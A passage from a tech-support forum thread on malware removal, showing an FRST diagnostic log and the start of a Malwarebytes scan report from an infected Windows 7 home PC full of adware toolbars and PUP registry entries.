SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {8657C459-5075-4FBA-8BFE-4CBF871F2795} URL = hxxp://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {9FB3E5E8-5531-442C-9220-713860FD4F3D} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {AFDCC033-36F7-40D5-9B8F-98FF5110CF48} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {BE8412CE-D220-4DA3-8A9F-1431ECED16DD} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {C04B7D22-5AEC-4561-8F49-27F6269208F6} URL = hxxp://www2.inbox.com/search/dispatcher.aspx?tp=bs&qkw={searchTerms}&tbid=82669&iwk=345&lng=en
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {F48980A0-589B-49F1-A35C-E7FF0B3C1B87} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=TV&apn_dtid=OSJ000YYUS&apn_uid=812BB0DA-AC09-4FF2-B5D6-F057151DD57C&apn_sauid=64628F7A-C26D-4635-A60F-4215D454D17B
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> DefaultScope {8665CF88-8873-4B00-9D4B-3900E6C9F53A} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {0CE02FFA-A6B0-46F6-BA2F-BD32C3630126} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {0EF36D49-D6DD-4970-86E0-3DA2639E10A2} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {29C18FBE-6679-48BA-AFEA-78BBAECB468E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {2C7CA5FC-AE04-47C9-88CB-D32F45776BC9} URL = hxxp://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {4937BE7D-D79B-4503-916B-57CD4454756C} URL = hxxp://websearch.shopathome.com?user_id={2F05AB4E-12C0-40B1-A060-7D2D2A519D8A}&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {4AAD6DF8-F7F8-4E3E-91A5-B7C706FA8A12} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=100000031&src=kw&q={searchTerms}&locale=en_US&apn_ptnrs=^TV&apn_dtid=^OSJ000^YY^US&apn_uid=812BB0DA-AC09-4FF2-B5D6-F057151DD57C&apn_sauid=64628F7A-C26D-4635-A60F-4215D454D17B
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {786CACE0-4B52-4B5E-9B22-4A8063236C63} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {8665CF88-8873-4B00-9D4B-3900E6C9F53A} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://isearch.avg.com/search?cid={FE4CF738-9FF4-4CB8-98D2-738ABE97B40A}&mid=408949922d1347d69a86b1a22fed5e2c-61e095b20595977a30febf70a3c5b2b516e4de0e&lang=us&ds=AVG&pr=fr&d=2011-12-12 09:44:38&v=17.3.0.49&pid=avg&sg=0&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {9FB3E5E8-5531-442C-9220-713860FD4F3D} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie9
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {BE8412CE-D220-4DA3-8A9F-1431ECED16DD} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {C04B7D22-5AEC-4561-8F49-27F6269208F6} URL = hxxp://www2.inbox.com/search/dispatcher.aspx?tp=bs&qkw={searchTerms}&tbid=82669&iwk=345&lng=en
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {cca2e567-1987-4100-a3c6-5b4267084510} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=YKman000&ptnrS=YKman000&ptb=7A5EC1B9-8047-4FF8-A1B9-C7D693FEB29C&psa=&ind=2012052710&st=sb&n=77ed7ce6&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL = 
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {D9EDB55B-B082-4361-B3FE-E16541CB7E88} URL = hxxp://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {F48980A0-589B-49F1-A35C-E7FF0B3C1B87} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=TV&apn_dtid=OSJ000YYUS&apn_uid=812BB0DA-AC09-4FF2-B5D6-F057151DD57C&apn_sauid=64628F7A-C26D-4635-A60F-4215D454D17B
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No File
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2013-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: ShopAtHome.com Cash Back Helper -> {66516A07-F617-488A-90CF-4E690CFB3C5F} -> C:\Users\Marilyn\AppData\Roaming\ShopAtHome\ShopAtHomeToolbar\tbcore3U.dll => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-12-18] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> No File
BHO-x32: GreatArcadeHits Add-on -> {D0C21091-FF8E-432C-9006-0540E81BA9D7} -> C:\Users\Marilyn\AppData\Local\GreatArcadeHits\GreatArcadeHitsIE.dll => No File
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-12-18] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: mysearchdial Helper Object -> {EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD} -> C:\Program Files (x86)\Mysearchdial\1.8.29.0\bh\mysearchdial.dll => No File
Toolbar: HKLM-x32 - ShopAtHome.com Toolbar - {311B58DC-A4DC-4B04-B1B5-60299AD3D803} - C:\Users\Marilyn\AppData\Roaming\ShopAtHome\ShopAtHomeToolbar\tbcore3U.dll No File
Toolbar: HKLM-x32 - mysearchdial Toolbar - {3004627E-F8E9-4E8B-909D-316753CBA923} - C:\Program Files (x86)\Mysearchdial\1.8.29.0\mysearchdialTlbr.dll No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {D7E97865-918F-41E4-9CD0-25AB1C574CE8} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {575BDDF5-790A-4D01-A37D-2863DEC1C085} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {D7E97865-918F-41E4-9CD0-25AB1C574CE8} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {575BDDF5-790A-4D01-A37D-2863DEC1C085} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {A0154E07-2B48-475C-A82A-80EFD84EA33E} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {364EA597-E728-4CE4-BB4A-ED846EF47970} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {D7E97865-918F-41E4-9CD0-25AB1C574CE8} -  No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {575BDDF5-790A-4D01-A37D-2863DEC1C085} -  No File
DPF: HKLM-x32 {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files (x86)\Yahoo!\Common\Yinsthelper.dll
DPF: HKLM-x32 {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab
DPF: HKLM-x32 {CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab
DPF: HKLM-x32 {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_51-windows-i586.cab
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2016-12-21] (McAfee, Inc. -> McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2016-12-21] (McAfee, Inc. -> McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\verizon.net -> hxxps://activate.verizon.net
IE trusted site: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\verizon.net -> hxxps://activate.verizon.net
IE trusted site: HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\verizon.net -> hxxps://activate.verizon.net
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 22:34 - 2022-03-28 11:17 - 000000062 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 kr1s.ru
127.0.0.1 zcop.ru
127.0.0.1 sql.4i7i.com
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> %CommonProgramFiles%\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Common Files\Roxio Shared\DLLShared\;C:\Program Files (x86)\Common Files\Roxio Shared\DLLShared\;C:\Program Files (x86)\Common Files\Roxio Shared\12.0\DLLShared\
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Control Panel\Desktop\\Wallpaper -> 
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Control Panel\Desktop\\Wallpaper -> C:\Users\Jay\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Control Panel\Desktop\\Wallpaper -> C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 172.16.103.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(If an entry is included in the fixlist, it will be removed.)
 
MSCONFIG\Services: CinemaNow Service => 2
MSCONFIG\Services: HomeNetSvc => 2
MSCONFIG\Services: McBootDelayStartSvc => 2
MSCONFIG\Services: McMPFSvc => 2
MSCONFIG\Services: McNaiAnn => 2
MSCONFIG\Services: McODS => 3
MSCONFIG\Services: mcpltsvc => 2
MSCONFIG\Services: McProxy => 2
MSCONFIG\Services: MSK80Service => 3
MSCONFIG\startupfolder: C:^Users^Marilyn^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Ink Alerts - .lnk => C:\Windows\pss\Monitor Ink Alerts - .lnk.Startup
MSCONFIG\startupfolder: C:^Users^Marilyn^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Ink Alerts - HP Deskjet 3050A J611 series (Network).lnk => C:\Windows\pss\Monitor Ink Alerts - HP Deskjet 3050A J611 series (Network).lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: AGupdate => C:\Program Files (x86)\AppGraffiti\AGupdate.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: AvgUi => "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=fmw
MSCONFIG\startupreg: BFHP => C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe
MSCONFIG\startupreg: CCleaner Smart Cleaning => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: HLBackupScheduler => "C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe"
MSCONFIG\startupreg: HotKeysCmds => C:\Windows\system32\hkcmd.exe
MSCONFIG\startupreg: HP ENVY 7640 series (NET) => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1
MSCONFIG\startupreg: HP Quick Launch => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: HPAdvisorDock => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe
MSCONFIG\startupreg: IgfxTray => C:\Windows\system32\igfxtray.exe
MSCONFIG\startupreg: PCKeeperLive => "C:\Program Files\Essentware\PCKeeper\PCKeeper.exe" /autorun
MSCONFIG\startupreg: Persistence => C:\Windows\system32\igfxpers.exe
MSCONFIG\startupreg: swg => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Restore Points =========================
 
 
==================== Faulty Device Manager Devices ============
 
Name: Microsoft Virtual WiFi Miniport Adapter
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: ========================
 
Application errors:
==================
Error: (03/28/2022 11:36:44 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://ctldl.windows...uthrootstl.cab>with error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.
.
 
Error: (03/28/2022 11:36:43 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://ctldl.windows...uthrootstl.cab>with error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.
.
 
Error: (03/28/2022 11:36:38 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://ctldl.windows...uthrootstl.cab>with error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.
.
 
Error: (03/28/2022 11:36:38 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://ctldl.windows...uthrootstl.cab>with error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.
.
 
Error: (03/28/2022 11:36:28 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://ctldl.windows...uthrootstl.cab>with error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.
.
 
Error: (03/28/2022 11:36:28 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://ctldl.windows...uthrootstl.cab>with error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.
.
 
Error: (03/28/2022 11:36:25 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://ctldl.windows...uthrootstl.cab>with error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.
.
 
Error: (03/28/2022 11:36:25 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://ctldl.windows...uthrootstl.cab>with error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider.
.
 
 
System errors:
=============
Error: (03/28/2022 11:41:58 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Volume Shadow Copy service terminated unexpectedly.  It has done this 4 time(s).
 
Error: (03/28/2022 11:41:51 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {BB6DF56B-CACE-11DC-9992-0019B93A3A84} did not register with DCOM within the required timeout.
 
Error: (03/28/2022 11:36:03 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Volume Shadow Copy service terminated unexpectedly.  It has done this 3 time(s).
 
Error: (03/28/2022 11:33:11 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Volume Shadow Copy service terminated unexpectedly.  It has done this 2 time(s).
 
Error: (03/28/2022 11:33:06 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Volume Shadow Copy service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (03/28/2022 11:17:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The IPsec Policy Agent service depends on the Base Filtering Engine service which failed to start because of the following error: 
Access is denied.
 
Error: (03/28/2022 11:17:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Base Filtering Engine service terminated with the following error: 
Access is denied.
 
Error: (03/28/2022 11:15:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The McAfee CSP Service service failed to start due to the following error: 
The system cannot find the file specified.
 
 
==================== Memory info =========================== 
 
BIOS: Hewlett-Packard F.15 04/07/2011
Motherboard: Hewlett-Packard 1605
Processor: Intel® Celeron® CPU 900 @ 2.20GHz
Percentage of memory in use: 88%
Total physical RAM: 3002.92 MB
Available physical RAM: 345.56 MB
Total Virtual: 6004.02 MB
Available Virtual: 667.17 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:216.47 GB) (Free:174.62 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:16.12 GB) (Free:2.28 GB) NTFS ==>[system with boot components (obtained from drive)]
 
\\?\Volume{8f022f87-fab2-11df-acd0-806e6f6e6963}\ (SYSTEM) (Fixed) (Total:0.19 GB) (Free:0.16 GB) NTFS
\\?\Volume{8f022f8a-fab2-11df-acd0-806e6f6e6963}\ (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.09 GB) FAT32
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 92636A50)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=216.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=16.1 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)
 
==================== End of Addition.txt =======================

Rich
 

Die with memories, not dreams. – Unknown


#6 Ztruker

Ztruker

    WTT Technical Elder

  • Tech Team
  • 8,292 posts
  • Interests:Helping people fix MS Windows related computer problems of all kinds.

    Waking each morning to see the green side of the Earth!

Posted 28 March 2022 - 11:03 AM

MBAM was deleted by one of the viruses. I just reinstalled it in Safe mode and started the scan in Safe mode. Should have the report in a half hour or so to post here.

 

When this PC is cleaned up, what is a good AV to install? It had McAfee but it had expired and AVG but it also expired. AVIRA or ESET?

 

!!! 1667 detections so far from MBAM.

 

 

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 3/28/22
Scan Time: 1:01 PM
Log File: bbf25362-aeb8-11ec-94a3-60eb6909b7df.json
 
-Software Information-
Version: 4.5.2.157
Components Version: 1.0.1562
Update Package Version: 1.0.49973
License: Trial
 
-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Marilyn-HP\Marilyn
 
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 383100
Threats Detected: 1667
Threats Quarantined: 0
Time Elapsed: 19 min, 43 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 283
PUP.Optional.VisualBee, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\VisualBee for Microsoft PowerPoint, No Action By User, 169, 175251, , , , , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Information-codedownloader, No Action By User, 1950, 259448, , , , , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0755F16F-16EE-419E-B0E7-0CC9CA968B96}, No Action By User, 1950, 259448, , , , , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{0755F16F-16EE-419E-B0E7-0CC9CA968B96}, No Action By User, 1950, 259448, , , , , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Information-firefoxinstaller, No Action By User, 1950, 259449, , , , , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{50705818-630E-4136-BA82-0DB9119DA4AC}, No Action By User, 1950, 259449, , , , , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{50705818-630E-4136-BA82-0DB9119DA4AC}, No Action By User, 1950, 259449, , , , , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Information-enabler, No Action By User, 1950, 260095, , , , , , 
PUP.Optional.CrossRider.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{25C3FE4E-7C48-447D-BAC5-141069528E0A}, No Action By User, 1950, 260095, , , , , , 
